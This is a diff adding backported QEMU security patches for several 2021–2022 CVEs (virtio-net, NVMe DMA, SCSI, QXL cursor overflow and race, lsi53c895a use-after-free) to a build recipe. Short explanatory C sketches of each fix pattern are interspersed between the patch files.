+--- a/hw/net/virtio-net.c
++++ b/hw/net/virtio-net.c
+@@ -1746,10 +1746,13 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ VirtIONet *n = qemu_get_nic_opaque(nc);
+ VirtIONetQueue *q = virtio_net_get_subqueue(nc);
+ VirtIODevice *vdev = VIRTIO_DEVICE(n);
++ VirtQueueElement *elems[VIRTQUEUE_MAX_SIZE];
++ size_t lens[VIRTQUEUE_MAX_SIZE];
+ struct iovec mhdr_sg[VIRTQUEUE_MAX_SIZE];
+ struct virtio_net_hdr_mrg_rxbuf mhdr;
+ unsigned mhdr_cnt = 0;
+- size_t offset, i, guest_offset;
++ size_t offset, i, guest_offset, j;
++ ssize_t err;
+
+ if (!virtio_net_can_receive(nc)) {
+ return -1;
+@@ -1780,6 +1783,12 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+
+ total = 0;
+
++ if (i == VIRTQUEUE_MAX_SIZE) {
++ virtio_error(vdev, "virtio-net unexpected long buffer chain");
++ err = size;
++ goto err;
++ }
++
+ elem = virtqueue_pop(q->rx_vq, sizeof(VirtQueueElement));
+ if (!elem) {
+ if (i) {
+@@ -1791,7 +1800,8 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ n->guest_hdr_len, n->host_hdr_len,
+ vdev->guest_features);
+ }
+- return -1;
++ err = -1;
++ goto err;
+ }
+
+ if (elem->in_num < 1) {
+@@ -1799,7 +1809,8 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ "virtio-net receive queue contains no in buffers");
+ virtqueue_detach_element(q->rx_vq, elem, 0);
+ g_free(elem);
+- return -1;
++ err = -1;
++ goto err;
+ }
+
+ sg = elem->in_sg;
+@@ -1836,12 +1847,13 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ if (!n->mergeable_rx_bufs && offset < size) {
+ virtqueue_unpop(q->rx_vq, elem, total);
+ g_free(elem);
+- return size;
++ err = size;
++ goto err;
+ }
+
+- /* signal other side */
+- virtqueue_fill(q->rx_vq, elem, total, i++);
+- g_free(elem);
++ elems[i] = elem;
++ lens[i] = total;
++ i++;
+ }
+
+ if (mhdr_cnt) {
+@@ -1851,10 +1863,23 @@ static ssize_t virtio_net_receive_rcu(NetClientState *nc, const uint8_t *buf,
+ &mhdr.num_buffers, sizeof mhdr.num_buffers);
+ }
+
++ for (j = 0; j < i; j++) {
++ /* signal other side */
++ virtqueue_fill(q->rx_vq, elems[j], lens[j], j);
++ g_free(elems[j]);
++ }
++
+ virtqueue_flush(q->rx_vq, i);
+ virtio_notify(vdev, q->rx_vq);
+
+ return size;
++
++err:
++ for (j = 0; j < i; j++) {
++ g_free(elems[j]);
++ }
++
++ return err;
+ }
+
+ static ssize_t virtio_net_do_receive(NetClientState *nc, const uint8_t *buf,
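Editor's note: the fix keeps each popped element and its length in local arrays and only hands them back after the mergeable-buffer header has been patched, because handing an element back also tears down its (possibly bounce-buffered) mapping. A loose sketch of that collect-then-commit ordering, with the virtqueue reduced to plain malloc'd buffers:

    #include <stdlib.h>
    #include <string.h>
    #include <stdint.h>
    #include <stdio.h>

    #define MAX_ELEMS 8

    /* Stand-in for "give the buffer back to the guest": after this call the
     * mapping is gone, so the buffer must not be written to any more. */
    static void commit(uint8_t *buf, size_t len)
    {
        (void)len;
        free(buf);
    }

    int main(void)
    {
        uint8_t *elems[MAX_ELEMS];
        size_t   lens[MAX_ELEMS];
        size_t   i, n;

        /* Collect phase: fill several buffers but do not commit them yet. */
        for (n = 0; n < 3; n++) {
            elems[n] = malloc(16);
            if (!elems[n]) {
                break;
            }
            memset(elems[n], 0, 16);
            lens[n] = 16;
        }

        if (n > 0) {
            /* Patch a header field that lives inside the first buffer. Doing
             * this *before* commit() is the whole point: once committed, the
             * buffer may already be unmapped or reused. */
            elems[0][0] = (uint8_t)n;   /* e.g. num_buffers */

            /* Commit phase: now every buffer can be handed back in order. */
            for (i = 0; i < n; i++) {
                commit(elems[i], lens[i]);
            }
        }
        printf("committed %zu buffers\n", n);
        return 0;
    }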
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch
new file mode 100644
index 0000000000..43630e71fb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3750.patch
@@ -0,0 +1,180 @@
+From 1938fbc7ec197e2612ab2ce36dd69bff19208aa5 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 10 Oct 2022 17:44:41 +0530
+Subject: [PATCH] CVE-2021-3750
+
+Upstream-Status: Backport [https://git.qemu.org/?p=qemu.git;a=commit;h=b9d383ab797f54ae5fa8746117770709921dc529 && https://git.qemu.org/?p=qemu.git;a=commit;h=3ab6fdc91b72e156da22848f0003ff4225690ced && https://git.qemu.org/?p=qemu.git;a=commit;h=58e74682baf4e1ad26b064d8c02e5bc99c75c5d9]
+CVE: CVE-2021-3750
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ exec.c | 55 +++++++++++++++++++++++++++++++-------
+ hw/intc/arm_gicv3_redist.c | 4 +--
+ include/exec/memattrs.h | 9 +++++++
+ 3 files changed, 56 insertions(+), 12 deletions(-)
+
+diff --git a/exec.c b/exec.c
+index 1360051a..10581d8d 100644
+--- a/exec.c
++++ b/exec.c
+@@ -39,6 +39,7 @@
+ #include "qemu/config-file.h"
+ #include "qemu/error-report.h"
+ #include "qemu/qemu-print.h"
++#include "qemu/log.h"
+ #if defined(CONFIG_USER_ONLY)
+ #include "qemu.h"
+ #else /* !CONFIG_USER_ONLY */
+@@ -3118,6 +3119,33 @@ static bool prepare_mmio_access(MemoryRegion *mr)
+ return release_lock;
+ }
+
++/**
++ * flatview_access_allowed
++ * @mr: #MemoryRegion to be accessed
++ * @attrs: memory transaction attributes
++ * @addr: address within that memory region
++ * @len: the number of bytes to access
++ *
++ * Check if a memory transaction is allowed.
++ *
++ * Returns: true if transaction is allowed, false if denied.
++ */
++static bool flatview_access_allowed(MemoryRegion *mr, MemTxAttrs attrs,
++ hwaddr addr, hwaddr len)
++{
++ if (likely(!attrs.memory)) {
++ return true;
++ }
++ if (memory_region_is_ram(mr)) {
++ return true;
++ }
++ qemu_log_mask(LOG_GUEST_ERROR,
++ "Invalid access to non-RAM device at "
++ "addr 0x%" HWADDR_PRIX ", size %" HWADDR_PRIu ", "
++ "region '%s'\n", addr, len, memory_region_name(mr));
++ return false;
++}
++
+ /* Called within RCU critical section. */
+ static MemTxResult flatview_write_continue(FlatView *fv, hwaddr addr,
+ MemTxAttrs attrs,
+@@ -3131,7 +3159,10 @@ static MemTxResult flatview_write_continue(FlatView *fv, hwaddr addr,
+ bool release_lock = false;
+
+ for (;;) {
+- if (!memory_access_is_direct(mr, true)) {
++ if (!flatview_access_allowed(mr, attrs, addr1, l)) {
++ result |= MEMTX_ACCESS_ERROR;
++ /* Keep going. */
++ } else if (!memory_access_is_direct(mr, true)) {
+ release_lock |= prepare_mmio_access(mr);
+ l = memory_access_size(mr, l, addr1);
+ /* XXX: could force current_cpu to NULL to avoid
+@@ -3173,14 +3204,14 @@ static MemTxResult flatview_write(FlatView *fv, hwaddr addr, MemTxAttrs attrs,
+ hwaddr l;
+ hwaddr addr1;
+ MemoryRegion *mr;
+- MemTxResult result = MEMTX_OK;
+
+ l = len;
+ mr = flatview_translate(fv, addr, &addr1, &l, true, attrs);
+- result = flatview_write_continue(fv, addr, attrs, buf, len,
+- addr1, l, mr);
+-
+- return result;
++ if (!flatview_access_allowed(mr, attrs, addr, len)) {
++ return MEMTX_ACCESS_ERROR;
++ }
++ return flatview_write_continue(fv, addr, attrs, buf, len,
++ addr1, l, mr);
+ }
+
+ /* Called within RCU critical section. */
+@@ -3195,7 +3226,10 @@ MemTxResult flatview_read_continue(FlatView *fv, hwaddr addr,
+ bool release_lock = false;
+
+ for (;;) {
+- if (!memory_access_is_direct(mr, false)) {
++ if (!flatview_access_allowed(mr, attrs, addr1, l)) {
++ result |= MEMTX_ACCESS_ERROR;
++ /* Keep going. */
++ } else if (!memory_access_is_direct(mr, false)) {
+ /* I/O case */
+ release_lock |= prepare_mmio_access(mr);
+ l = memory_access_size(mr, l, addr1);
+@@ -3238,6 +3272,9 @@ static MemTxResult flatview_read(FlatView *fv, hwaddr addr,
+
+ l = len;
+ mr = flatview_translate(fv, addr, &addr1, &l, false, attrs);
++ if (!flatview_access_allowed(mr, attrs, addr, len)) {
++ return MEMTX_ACCESS_ERROR;
++ }
+ return flatview_read_continue(fv, addr, attrs, buf, len,
+ addr1, l, mr);
+ }
+@@ -3474,12 +3511,10 @@ bool address_space_access_valid(AddressSpace *as, hwaddr addr,
+ MemTxAttrs attrs)
+ {
+ FlatView *fv;
+- bool result;
+
+ RCU_READ_LOCK_GUARD();
+ fv = address_space_to_flatview(as);
+- result = flatview_access_valid(fv, addr, len, is_write, attrs);
+- return result;
++ return flatview_access_valid(fv, addr, len, is_write, attrs);
+ }
+
+ static hwaddr
+diff --git a/hw/intc/arm_gicv3_redist.c b/hw/intc/arm_gicv3_redist.c
+index 8645220d..44368e28 100644
+--- a/hw/intc/arm_gicv3_redist.c
++++ b/hw/intc/arm_gicv3_redist.c
+@@ -450,7 +450,7 @@ MemTxResult gicv3_redist_read(void *opaque, hwaddr offset, uint64_t *data,
+ break;
+ }
+
+- if (r == MEMTX_ERROR) {
++ if (r != MEMTX_OK) {
+ qemu_log_mask(LOG_GUEST_ERROR,
+ "%s: invalid guest read at offset " TARGET_FMT_plx
+ "size %u\n", __func__, offset, size);
+@@ -507,7 +507,7 @@ MemTxResult gicv3_redist_write(void *opaque, hwaddr offset, uint64_t data,
+ break;
+ }
+
+- if (r == MEMTX_ERROR) {
++ if (r != MEMTX_OK) {
+ qemu_log_mask(LOG_GUEST_ERROR,
+ "%s: invalid guest write at offset " TARGET_FMT_plx
+ "size %u\n", __func__, offset, size);
+diff --git a/include/exec/memattrs.h b/include/exec/memattrs.h
+index 95f2d20d..9fb98bc1 100644
+--- a/include/exec/memattrs.h
++++ b/include/exec/memattrs.h
+@@ -35,6 +35,14 @@ typedef struct MemTxAttrs {
+ unsigned int secure:1;
+ /* Memory access is usermode (unprivileged) */
+ unsigned int user:1;
++ /*
++ * Bus interconnect and peripherals can access anything (memories,
++ * devices) by default. By setting the 'memory' bit, bus transaction
++ * are restricted to "normal" memories (per the AMBA documentation)
++ * versus devices. Access to devices will be logged and rejected
++ * (see MEMTX_ACCESS_ERROR).
++ */
++ unsigned int memory:1;
+ /* Requester ID (for MSI for example) */
+ unsigned int requester_id:16;
+ /* Invert endianness for this page */
+@@ -66,6 +74,7 @@ typedef struct MemTxAttrs {
+ #define MEMTX_OK 0
+ #define MEMTX_ERROR (1U << 0) /* device returned an error */
+ #define MEMTX_DECODE_ERROR (1U << 1) /* nothing at that address */
++#define MEMTX_ACCESS_ERROR (1U << 2) /* access denied */
+ typedef uint32_t MemTxResult;
+
+ #endif
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch
new file mode 100644
index 0000000000..a1862f1226
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3929.patch
@@ -0,0 +1,81 @@
+From 2c682b5975b41495f98cc34b8243042c446eec44 Mon Sep 17 00:00:00 2001
+From: Gaurav Gupta <gauragup@cisco.com>
+Date: Wed, 29 Mar 2023 14:36:16 -0700
+Subject: [PATCH] hw/nvme: fix CVE-2021-3929
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This fixes CVE-2021-3929 "locally" by denying DMA to the iomem of the
+device itself. This still allows DMA to MMIO regions of other devices
+(e.g. doing P2P DMA to the controller memory buffer of another NVMe
+device).
+
+Fixes: CVE-2021-3929
+Reported-by: Qiuhao Li <Qiuhao.Li@outlook.com>
+Reviewed-by: Keith Busch <kbusch@kernel.org>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Klaus Jensen <k.jensen@samsung.com>
+
+Upstream-Status: Backport
+[https://gitlab.com/qemu-project/qemu/-/commit/736b01642d85be832385]
+CVE: CVE-2021-3929
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+Signed-off-by: Gaurav Gupta <gauragup@cisco.com>
+---
+ hw/block/nvme.c | 23 +++++++++++++++++++++++
+ hw/block/nvme.h | 1 +
+ 2 files changed, 24 insertions(+)
+
+diff --git a/hw/block/nvme.c b/hw/block/nvme.c
+index bda446d..ae9b19f 100644
+--- a/hw/block/nvme.c
++++ b/hw/block/nvme.c
+@@ -60,8 +60,31 @@ static bool nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
+ return addr >= low && addr < hi;
+ }
+
++static inline bool nvme_addr_is_iomem(NvmeCtrl *n, hwaddr addr)
++{
++ hwaddr hi, lo;
++
++ /*
++ * The purpose of this check is to guard against invalid "local" access to
++ * the iomem (i.e. controller registers). Thus, we check against the range
++ * covered by the 'bar0' MemoryRegion since that is currently composed of
++ * two subregions (the NVMe "MBAR" and the MSI-X table/pba). Note, however,
++ * that if the device model is ever changed to allow the CMB to be located
++ * in BAR0 as well, then this must be changed.
++ */
++ lo = n->bar0.addr;
++ hi = lo + int128_get64(n->bar0.size);
++
++ return addr >= lo && addr < hi;
++}
++
+ static int nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
+ {
++
++ if (nvme_addr_is_iomem(n, addr)) {
++ return NVME_DATA_TRAS_ERROR;
++ }
++
+ if (n->cmbsz && nvme_addr_is_cmb(n, addr)) {
+ memcpy(buf, (void *)&n->cmbuf[addr - n->ctrl_mem.addr], size);
+ return 0;
+diff --git a/hw/block/nvme.h b/hw/block/nvme.h
+index 557194e..5a2b119 100644
+--- a/hw/block/nvme.h
++++ b/hw/block/nvme.h
+@@ -59,6 +59,7 @@ typedef struct NvmeNamespace {
+
+ typedef struct NvmeCtrl {
+ PCIDevice parent_obj;
++ MemoryRegion bar0;
+ MemoryRegion iomem;
+ MemoryRegion ctrl_mem;
+ NvmeBar bar;
+--
+1.8.3.1
+
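Editor's note: the new nvme_addr_is_iomem() helper rejects DMA addresses that fall inside the controller's own register window. A standalone sketch of the same [lo, hi) range check; the base and size constants here are invented, whereas the patch derives them from the device's BAR0 MemoryRegion:

    #include <stdint.h>
    #include <stdbool.h>
    #include <stddef.h>
    #include <stdio.h>

    /* Hypothetical register window. */
    #define IOMEM_BASE 0xfe000000ull
    #define IOMEM_SIZE 0x4000ull

    static bool addr_is_iomem(uint64_t addr)
    {
        return addr >= IOMEM_BASE && addr < IOMEM_BASE + IOMEM_SIZE;
    }

    /* Refuse "local" DMA that targets the device's own MMIO window. */
    static int dma_read(uint64_t addr, void *buf, size_t size)
    {
        (void)buf;
        (void)size;
        if (addr_is_iomem(addr)) {
            return -1;   /* transfer error, as in the patch */
        }
        /* ... normal RAM/CMB access would happen here ... */
        return 0;
    }

    int main(void)
    {
        char tmp[8];

        printf("%d\n", dma_read(0x1000, tmp, sizeof(tmp)));        /* 0: allowed */
        printf("%d\n", dma_read(0xfe000100ull, tmp, sizeof(tmp))); /* -1: denied */
        return 0;
    }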
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch
new file mode 100644
index 0000000000..b1b5558647
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch
@@ -0,0 +1,53 @@
+From b3af7fdf9cc537f8f0dd3e2423d83f5c99a457e8 Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Thu, 4 Nov 2021 17:31:38 +0100
+Subject: [PATCH] hw/scsi/scsi-disk: MODE_PAGE_ALLS not allowed in MODE SELECT
+ commands
+
+This avoids an off-by-one read of 'mode_sense_valid' buffer in
+hw/scsi/scsi-disk.c:mode_sense_page().
+
+Fixes: CVE-2021-3930
+Cc: qemu-stable@nongnu.org
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Fixes: a8f4bbe2900 ("scsi-disk: store valid mode pages in a table")
+Fixes: #546
+Reported-by: Qiuhao Li <Qiuhao.Li@outlook.com>
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/b3af7fdf9cc537f8f0dd3e2423d83f5c99a457e8
+CVE: CVE-2021-3930
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/scsi-disk.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/hw/scsi/scsi-disk.c b/hw/scsi/scsi-disk.c
+index e8a547dbb7..d4914178ea 100644
+--- a/hw/scsi/scsi-disk.c
++++ b/hw/scsi/scsi-disk.c
+@@ -1087,6 +1087,7 @@ static int mode_sense_page(SCSIDiskState *s, int page, uint8_t **p_outbuf,
+ uint8_t *p = *p_outbuf + 2;
+ int length;
+
++ assert(page < ARRAY_SIZE(mode_sense_valid));
+ if ((mode_sense_valid[page] & (1 << s->qdev.type)) == 0) {
+ return -1;
+ }
+@@ -1428,6 +1429,11 @@ static int scsi_disk_check_mode_select(SCSIDiskState *s, int page,
+ return -1;
+ }
+
++ /* MODE_PAGE_ALLS is only valid for MODE SENSE commands */
++ if (page == MODE_PAGE_ALLS) {
++ return -1;
++ }
++
+ p = mode_current;
+ memset(mode_current, 0, inlen + 2);
+ len = mode_sense_page(s, page, &p, 0);
+--
+GitLab
+
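Editor's note: the added assert() documents that the page value indexing mode_sense_valid[] must already be in range, and the MODE SELECT check rejects the one command value (MODE_PAGE_ALLS) that would otherwise land one past the table. A tiny sketch of the table-lookup guard; the table contents and size here are invented:

    #include <assert.h>
    #include <stdint.h>
    #include <stdio.h>

    #define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))

    static const uint8_t valid_pages[0x3f] = { [0x08] = 1, [0x0a] = 1 };

    static int page_supported(unsigned page)
    {
        /* Callers must have rejected out-of-range values already; the assert
         * turns a silent one-byte over-read into an immediate, loud failure. */
        assert(page < ARRAY_SIZE(valid_pages));
        return valid_pages[page];
    }

    int main(void)
    {
        printf("%d %d\n", page_supported(0x08), page_supported(0x00));
        return 0;
    }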
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch
new file mode 100644
index 0000000000..80ad49e4ed
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch
@@ -0,0 +1,89 @@
+From fa892e9abb728e76afcf27323ab29c57fb0fe7aa Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Thu, 7 Apr 2022 10:17:12 +0200
+Subject: [PATCH] ui/cursor: fix integer overflow in cursor_alloc
+ (CVE-2021-4206)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Prevent potential integer overflow by limiting 'width' and 'height' to
+512x512. Also change 'datasize' type to size_t. Refer to security
+advisory https://starlabs.sg/advisories/22-4206/ for more information.
+
+Fixes: CVE-2021-4206
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20220407081712.345609-1-mcascell@redhat.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/fa892e9a
+CVE: CVE-2021-4206
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/display/qxl-render.c | 7 +++++++
+ hw/display/vmware_vga.c | 2 ++
+ ui/cursor.c | 8 +++++++-
+ 3 files changed, 16 insertions(+), 1 deletion(-)
+
+diff --git a/hw/display/qxl-render.c b/hw/display/qxl-render.c
+index 237ed293ba..ca217004bf 100644
+--- a/hw/display/qxl-render.c
++++ b/hw/display/qxl-render.c
+@@ -247,6 +247,13 @@ static QEMUCursor *qxl_cursor(PCIQXLDevice *qxl, QXLCursor *cursor,
+ size_t size;
+
+ c = cursor_alloc(cursor->header.width, cursor->header.height);
++
++ if (!c) {
++ qxl_set_guest_bug(qxl, "%s: cursor %ux%u alloc error", __func__,
++ cursor->header.width, cursor->header.height);
++ goto fail;
++ }
++
+ c->hot_x = cursor->header.hot_spot_x;
+ c->hot_y = cursor->header.hot_spot_y;
+ switch (cursor->header.type) {
+diff --git a/hw/display/vmware_vga.c b/hw/display/vmware_vga.c
+index 98c83474ad..45d06cbe25 100644
+--- a/hw/display/vmware_vga.c
++++ b/hw/display/vmware_vga.c
+@@ -515,6 +515,8 @@ static inline void vmsvga_cursor_define(struct vmsvga_state_s *s,
+ int i, pixels;
+
+ qc = cursor_alloc(c->width, c->height);
++ assert(qc != NULL);
++
+ qc->hot_x = c->hot_x;
+ qc->hot_y = c->hot_y;
+ switch (c->bpp) {
+diff --git a/ui/cursor.c b/ui/cursor.c
+index 1d62ddd4d0..835f0802f9 100644
+--- a/ui/cursor.c
++++ b/ui/cursor.c
+@@ -46,6 +46,8 @@ static QEMUCursor *cursor_parse_xpm(const char *xpm[])
+
+ /* parse pixel data */
+ c = cursor_alloc(width, height);
++ assert(c != NULL);
++
+ for (pixel = 0, y = 0; y < height; y++, line++) {
+ for (x = 0; x < height; x++, pixel++) {
+ idx = xpm[line][x];
+@@ -91,7 +93,11 @@ QEMUCursor *cursor_builtin_left_ptr(void)
+ QEMUCursor *cursor_alloc(int width, int height)
+ {
+ QEMUCursor *c;
+- int datasize = width * height * sizeof(uint32_t);
++ size_t datasize = width * height * sizeof(uint32_t);
++
++ if (width > 512 || height > 512) {
++ return NULL;
++ }
+
+ c = g_malloc0(sizeof(QEMUCursor) + datasize);
+ c->width = width;
+--
+GitLab
+
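Editor's note: the patch widens the size computation to size_t and caps the dimensions, because width * height * 4 evaluated in int can overflow and yield an undersized allocation that later writes overrun. A sketch of the hardened computation; the 512 limit mirrors the patch, while the function name is illustrative:

    #include <stdint.h>
    #include <stdlib.h>
    #include <stdio.h>

    #define MAX_CURSOR_DIM 512

    /* Return a zeroed pixel buffer, or NULL if the dimensions are unreasonable.
     * Computing 'datasize' in size_t (and bounding the inputs first) avoids the
     * signed-int overflow that made the original allocation undersized. */
    static uint32_t *cursor_pixels_alloc(int width, int height)
    {
        size_t datasize;

        if (width <= 0 || height <= 0 ||
            width > MAX_CURSOR_DIM || height > MAX_CURSOR_DIM) {
            return NULL;
        }
        datasize = (size_t)width * (size_t)height * sizeof(uint32_t);
        return calloc(1, datasize);
    }

    int main(void)
    {
        uint32_t *ok = cursor_pixels_alloc(64, 64);

        printf("%s\n", ok ? "ok" : "rejected");
        free(ok);
        printf("%s\n", cursor_pixels_alloc(70000, 70000) ? "ok" : "rejected");
        return 0;
    }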
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch
new file mode 100644
index 0000000000..8418246247
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch
@@ -0,0 +1,43 @@
+From 9569f5cb5b4bffa9d3ebc8ba7da1e03830a9a895 Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Thu, 7 Apr 2022 10:11:06 +0200
+Subject: [PATCH] display/qxl-render: fix race condition in qxl_cursor
+ (CVE-2021-4207)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Avoid fetching 'width' and 'height' a second time to prevent possible
+race condition. Refer to security advisory
+https://starlabs.sg/advisories/22-4207/ for more information.
+
+Fixes: CVE-2021-4207
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20220407081106.343235-1-mcascell@redhat.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/9569f5cb
+CVE: CVE-2021-4207
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/display/qxl-render.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/display/qxl-render.c b/hw/display/qxl-render.c
+index d28849b121..237ed293ba 100644
+--- a/hw/display/qxl-render.c
++++ b/hw/display/qxl-render.c
+@@ -266,7 +266,7 @@ static QEMUCursor *qxl_cursor(PCIQXLDevice *qxl, QXLCursor *cursor,
+ }
+ break;
+ case SPICE_CURSOR_TYPE_ALPHA:
+- size = sizeof(uint32_t) * cursor->header.width * cursor->header.height;
++ size = sizeof(uint32_t) * c->width * c->height;
+ qxl_unpack_chunks(c->data, size, qxl, &cursor->chunk, group_id);
+ if (qxl->debug > 2) {
+ cursor_print_ascii_art(c, "qxl/alpha");
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch
new file mode 100644
index 0000000000..6a7ce0e26c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch
@@ -0,0 +1,42 @@
+From 6c8fa961da5e60f574bb52fd3ad44b1e9e8ad4b8 Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Tue, 5 Jul 2022 22:05:43 +0200
+Subject: [PATCH] scsi/lsi53c895a: fix use-after-free in lsi_do_msgout
+ (CVE-2022-0216)
+
+Set current_req->req to NULL to prevent reusing a free'd buffer in case of
+repeated SCSI cancel requests. Thanks to Thomas Huth for suggesting the patch.
+
+Fixes: CVE-2022-0216
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/972
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Reviewed-by: Thomas Huth <thuth@redhat.com>
+Message-Id: <20220705200543.2366809-1-mcascell@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/6c8fa961da5e60f574bb52fd3ad44b1e9e8ad4b8
+CVE: CVE-2022-0216
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/lsi53c895a.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/hw/scsi/lsi53c895a.c b/hw/scsi/lsi53c895a.c
+index c8773f73f7..99ea42d49b 100644
+--- a/hw/scsi/lsi53c895a.c
++++ b/hw/scsi/lsi53c895a.c
+@@ -1028,8 +1028,9 @@ static void lsi_do_msgout(LSIState *s)
+ case 0x0d:
+ /* The ABORT TAG message clears the current I/O process only. */
+ trace_lsi_do_msgout_abort(current_tag);
+- if (current_req) {
++ if (current_req && current_req->req) {
+ scsi_req_cancel(current_req->req);
++ current_req->req = NULL;
+ }
+ lsi_disconnect(s);
+ break;
+--
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch
new file mode 100644
index 0000000000..137906cd30
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch
@@ -0,0 +1,52 @@
+From 4367a20cc442c56b05611b4224de9a61908f9eac Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Mon, 11 Jul 2022 14:33:16 +0200
+Subject: [PATCH] scsi/lsi53c895a: really fix use-after-free in lsi_do_msgout
+ (CVE-2022-0216)
+
+Set current_req to NULL, not current_req->req, to prevent reusing a free'd
+buffer in case of repeated SCSI cancel requests. Also apply the fix to
+CLEAR QUEUE and BUS DEVICE RESET messages as well, since they also cancel
+the request.
+
+Thanks to Alexander Bulekov for providing a reproducer.
+
+Fixes: CVE-2022-0216
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/972
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20220711123316.421279-1-mcascell@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/4367a20cc4
+CVE: CVE-2022-0216
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/lsi53c895a.c | 3 +-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/hw/scsi/lsi53c895a.c b/hw/scsi/lsi53c895a.c
+index 99ea42d49b..ad5f5e5f39 100644
+--- a/hw/scsi/lsi53c895a.c
++++ b/hw/scsi/lsi53c895a.c
+@@ -1030,7 +1030,7 @@ static void lsi_do_msgout(LSIState *s)
+ trace_lsi_do_msgout_abort(current_tag);
+ if (current_req && current_req->req) {
+ scsi_req_cancel(current_req->req);
+- current_req->req = NULL;
++ current_req = NULL;
+ }
+ lsi_disconnect(s);
+ break;
+@@ -1056,6 +1056,7 @@ static void lsi_do_msgout(LSIState *s)
+ /* clear the current I/O process */
+ if (s->current) {
+ scsi_req_cancel(s->current->req);
++ current_req = NULL;
+ }
+
+ /* As the current implemented devices scsi_disk and scsi_generic
+--
+GitLab
+
